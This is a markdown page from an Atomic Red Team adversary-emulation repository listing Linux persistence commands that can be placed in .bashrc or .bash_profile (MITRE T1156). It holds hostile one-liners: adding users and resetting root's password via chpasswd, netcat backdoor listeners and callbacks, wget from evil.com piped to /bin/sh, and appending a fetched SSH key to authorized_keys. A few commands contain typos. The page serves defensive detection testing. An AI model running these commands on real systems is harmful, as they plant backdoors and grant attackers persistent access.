security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
533e27193fcdff5782f989b8739cf2b4a9d2e015
atomic-red-team/Linux/Persistence/bash_profile_and_bashrc.md
T
Rahmat Nurfauzi 4842ffb05d Persistence .bashrc / .bash_profile
2018-01-07 05:55:19 +07:00

928 B
Raw Blame History

.bash_profile and .bashrc

MITRE ATT&CK Technique: T1156

  • Adding an unauthorized user (useradd)
    • useradd test && echo test:testpass | chpasswd
  • Changing the password to an existing user (noisy, passwd)
    • echo root:NoLogon | chpasswd (use nologon as pass word for a tiny bit of obscurity)
  • Create a backdoor listener (netcat)
    • nc nlp 8080
  • Create a backdoor callback (netcat)
    • nc 192.168.0.1 8080
  • Retrieve commands from a C2 server (wget or curl)
    • wget https://evil.com/more/commands.txt | /bin/sh
  • Download additional tools and execute (wget or curl)
    • wget https://evil.com/bad/executeable | /bin/sh
  • Add key to authorized_keys file (paste or get from remote server)
    • echo $(wget https://evil.com/bad/ssh/key.txt) >> ~/.ssh/authotized_keys
  • Set an alias to do additional tasks
    • alias ls='ls al & <any command from above>'
Reference in New Issue View Git Blame Copy Permalink